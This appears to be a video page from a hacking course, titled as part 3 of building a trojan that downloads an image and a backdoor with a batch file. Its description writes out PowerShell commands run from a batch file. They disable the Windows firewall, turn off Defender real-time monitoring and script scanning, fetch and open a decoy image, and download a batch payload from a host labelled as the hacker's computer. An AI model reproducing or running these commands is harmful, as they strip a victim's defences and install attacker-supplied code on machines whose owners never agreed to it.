41 Trojan Downloading an Image and the backdoor with the Batch File Part 3
דרג סרטון זה
התחבר כדי לדרג
תיאור
You can run PowerShell commands from cmd/bat files by passing the commands as an argument to the powershell command. Powershell -Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False Powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true Powershell -Command Set-MpPreference -DisableScriptScanning $true Powershell -Command Invoke-WebRequest 'https://img.com/matrix.png' -Outfile matrix.png matrix.png # the IP where the python server is running (The hackers computer) Powershell -Command Invoke-WebRequest 'http://hacker/matrix.bat' -Outfile matrix.bat